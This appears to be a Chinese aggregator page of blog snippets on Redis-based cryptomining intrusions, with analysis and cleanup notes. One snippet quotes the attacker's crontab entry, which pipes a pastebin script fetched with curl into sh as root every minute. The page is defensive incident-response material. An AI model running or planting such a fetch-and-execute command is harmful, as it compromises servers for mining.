原文:記一次利用redis橫向移動挖礦分析

該木馬使用Linux系統的shell腳本編寫Downloader,使用curl與wget命令發起網絡請求下載木馬的其他組件,雖然代碼可被輕易分析,但是編寫成本和門檻降低,這也是當前惡意代碼使用腳本語言編寫的一個趨勢。 攻擊者通過RCE執行可疑腳本 .挖礦流程分析圖 .下面分析挖礦程序的初始化腳本 ...

2021-01-25 17:20 0 704 推薦指數:

查看詳情

一次redis病毒分析筆記

起因 偶然間發現redis里有一個陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道這肯定不是我們存的,再看value我警覺了,這是要定時執行腳本啊。 分析 ...

Wed Sep 05 23:13:00 CST 2018 2 944
一次 挖礦程序入侵和處理

為了方便遠程使用,師弟把實驗室的電腦映射的公網上,結果被植入了挖礦程序 挖礦軟件是這個,因為已經被清理掉了,所以看不到運行了,不然的話,使用 nvidia-smi 命令可以看到這個挖礦程序在工作。 然后進入到這個進程中, cd /proc/$PID , 查看它的信息 ...

Fri May 28 23:43:00 CST 2021 0 215
一次linux挖礦木馬應急

1.拿到了一個靶機,top檢查,發現有一個進程CPU利用率一直在百分之百,經過特征對比,發現是挖礦木馬 2.利用 ll /proc/端口ID/exe 定位木馬文件所在位置 3.rm -rf 刪除掉木馬文件 4.原本以為搞定了,過了一會發現還是有利用率百分之百情況 5.查看 cat ...

Fri Aug 16 16:19:00 CST 2019 0 523
一次挖礦木馬的較量---linux下的挖礦

一次挖礦木馬的較量 聚銘網絡 2022-02-22 10:51:18 78105 1 一、概述 本文主要是記錄了一次針對挖礦程序的應急響應處理,從三個部分來解讀此次事件 ...

Wed Mar 16 18:17:00 CST 2022 0 1048
一次Linux服務器因redis漏洞的挖礦病毒入侵

中毒原因,redis bind 0.0.0.0 而且沒有密碼,和安全意識太薄弱。 所以,redis一定要設密碼,改端口,不要用root用戶啟動,如果業務沒有需要,不要bind 0.0.0.0!!!!!!!!!!! 這個病毒能都橫向傳播,不要以為在外網redis的端口不通就沒有事情。只要內網 ...

Sun Apr 14 01:28:00 CST 2019 0 1889
一次雲服務器被挖礦的經歷

收到中毒郵件通知 收到通知后思前想后,也不知道問題在哪,第一次遇到這事…… 分析 一查這是個挖礦軟件,遂進入該目錄 crontab 是定時任務,打開一看是: curl 是下載命令,定時下載init.sh腳本,瀏覽器手動下載后,立馬被火絨攔截。我把它救出來后打開腳本,正是下載病毒 ...

Thu Aug 22 21:23:00 CST 2019 0 1624
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM